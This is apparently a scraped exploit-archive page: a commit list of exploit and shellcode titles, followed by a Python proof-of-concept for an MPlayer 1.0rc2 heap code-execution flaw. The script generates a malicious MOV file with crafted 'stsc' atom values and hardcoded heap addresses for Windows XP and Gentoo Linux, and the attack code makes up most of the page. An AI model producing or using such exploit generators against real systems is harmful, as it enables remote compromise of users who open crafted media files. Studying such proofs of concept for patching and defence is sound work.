
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
57 lines
No EOL
1.9 KiB
Python
Executable file
57 lines
No EOL
1.9 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/27499/info
|
|
|
|
MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition.
|
|
|
|
This issue affects MPlayer 1.0rc2; other versions may also be affected.
|
|
|
|
#!/bin/python
|
|
|
|
import struct
|
|
import sys
|
|
|
|
def mkatom(type,data):
|
|
if len(type) != 4:
|
|
raise "type must by of length 4!!!"
|
|
mov = ""
|
|
mov += struct.pack(">L",len(data)+8)
|
|
mov += type
|
|
mov += data
|
|
return mov
|
|
|
|
def poc(address, block_size):
|
|
|
|
what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
|
|
base= ((address - 8) / block_size) +1
|
|
|
|
ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
|
|
mdat = mkatom("mdat","MALDAAAAAD!")
|
|
stsc = mkatom("stsc",struct.pack(">L",1) + \
|
|
struct.pack(">L",2) + \
|
|
struct.pack(">L",base) + \
|
|
what + \
|
|
struct.pack(">L",base+300)+what)
|
|
trak = mkatom("trak",stsc)
|
|
moov = mkatom("moov",trak)
|
|
|
|
file = ftyp + mdat + moov
|
|
return file
|
|
|
|
try:
|
|
if sys.argv[2] != "linux":
|
|
evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES
|
|
else:
|
|
evilness = poc(0x088aa020, 20) #Linux Gentoo
|
|
|
|
print "[+] Generating file: %s" % sys.argv[1]
|
|
file = open(sys.argv[1], "wb")
|
|
file.write(evilness)
|
|
file.close()
|
|
print "[+] Done."
|
|
|
|
except Exception, e:
|
|
print "[+] Usage: python mplayer_poc.py filename.mov windows (For
|
|
WinXP Prof SP2 ES)"
|
|
print " python mplayer_poc.py filename.mov linux (For
|
|
Linux Gentoo)" |